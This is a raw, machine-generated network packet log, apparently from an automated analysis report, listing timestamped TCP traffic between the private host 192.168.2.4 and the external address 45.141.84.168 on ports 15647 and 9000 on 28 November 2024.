                                          Nov 28, 2024 13:39:58.743940115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.820884943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.820960045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.940895081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.940970898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.941137075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.984867096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.065123081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.065313101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.183790922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.184015989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.262701988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.262764931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.305851936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.305912971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.383481026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.383537054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.384872913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.437968016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.474679947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.474751949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.504972935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.505053043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.507050991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.563014030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.625022888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.625135899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.627835035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.672365904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.792402983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.792464972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.796139956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.796224117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.947994947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.948071003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:59.997226000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:59.997322083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.113981009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.114083052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.166654110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.166723967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.234143972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.234252930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.269387960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.269460917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.334722042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.334798098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.354377985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.354470968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.389466047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.435534000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.435621977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.474585056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.474628925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.555718899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.555835962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.656160116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.656416893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.742734909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.742818117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.757035971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.757123947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.776453972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.776567936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.862768888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.862847090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.877156973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.922310114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.950658083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.950839996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.977956057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:00.978058100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:00.983351946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.077986002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.078058004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.097910881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.097990036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.154695988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.154928923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.184604883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.184799910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.201395988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.218843937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.218998909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.274863958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.274944067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.305941105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.306133986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.343763113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.343852997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.420087099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.420226097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.468492031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.468686104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.544985056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.545195103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.594321012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.594492912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.670150995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.670248985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.790326118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.790390015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.795634985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.844110966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.915793896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.915936947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:01.991539001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:01.991616011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.112103939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.112402916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.237124920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.237250090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.483860970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.484013081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.602593899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.602802038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.735526085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.735636950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.815416098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.815490007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.936214924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.936316013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:02.936578989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:02.984873056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.059827089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.060050011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.085501909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.085577011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.206624985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.209780931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.257560968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.257669926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.377788067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.378632069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.381814003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.437855959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.458895922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.459796906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.579247952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.581901073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.666588068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.669926882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.780338049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.781965017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:03.902651072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.904957056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:03.905158997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.104078054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.104249954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.151786089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.151978016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.227194071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.227333069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.347457886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.347590923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.352896929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.406714916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.548736095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.549771070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.674026012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.674181938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.749790907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.750010967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.869980097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.870042086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.875509024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.922235966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:04.991796017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:04.991874933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.071187973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.073805094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.193880081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.197756052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.272490978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.272594929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.393276930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.393331051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.395085096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.437875986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.474472046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.474648952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.594630957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.597773075 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.716022015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.716100931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.795797110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.797787905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:05.919656038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.919855118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:05.919953108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.037400007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.037795067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.158039093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.158185959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.163767099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.203553915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.359363079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.359586954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.412273884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.412477970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.538573027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.538659096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.560620070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.560708046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.613447905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.613529921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.680660009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.680751085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.761734009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.761840105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:06.882018089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:06.882087946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.002037048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.002137899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.203614950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.203795910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.209204912 CET90004976945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.209428072 CET497699000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.209443092 CET90004976945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.209503889 CET497699000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.314629078 CET497839000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.323574066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.323645115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.329370022 CET90004976945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.435411930 CET90004978345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.435472012 CET497839000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.435596943 CET497839000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.444174051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.444226027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.451826096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.451894999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.556020975 CET90004978345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.645987034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.646152020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.766294956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.766380072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:07.967324018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:07.967504978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.092206001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.092397928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.212029934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.212299109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.332298994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.332366943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.413196087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.413268089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.533771038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.533859015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.654100895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.654160023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.737646103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.737736940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.838670969 CET90004978345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.838834047 CET90004978345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.838891983 CET497839000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.841711998 CET497839000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.855329037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.855571985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.955012083 CET497879000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.960479021 CET90004978345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.977431059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:08.977601051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:08.978106022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.031744957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.075084925 CET90004978745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.075170040 CET497879000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.075268030 CET497879000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.178690910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.178769112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.197448015 CET90004978745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.224031925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.224133015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.298809052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.301760912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.345786095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.345846891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.424963951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.425774097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.546545029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.547173023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.547297001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.668204069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.669786930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.792058945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.797364950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.917253017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.917318106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:09.994936943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:09.995023966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.115381002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.117785931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.118716955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.118782997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.241617918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.241790056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.406110048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.406675100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.525937080 CET90004978745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.525949955 CET90004978745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.525980949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.525995970 CET497879000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.526035070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.526238918 CET497879000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.526638985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.579047918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.579111099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.641850948 CET497939000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.646074057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.646183968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.646235943 CET90004978745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.701874018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.701930046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.729077101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.729242086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.766014099 CET90004979345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.766084909 CET497939000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.766207933 CET497939000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.810626030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.810684919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.822556973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.822606087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.847434044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.847515106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.886143923 CET90004979345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.898627043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.898689985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.930846930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.933465004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.942851067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.945750952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.967500925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.967859983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:10.971406937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:10.971486092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.053606033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.053661108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.087827921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.087876081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.132066965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.132134914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.208024025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.208084106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.215797901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.265991926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.326606035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.326664925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.328000069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.333257914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.333373070 CET4973015647192.168.2.445.141.84.168
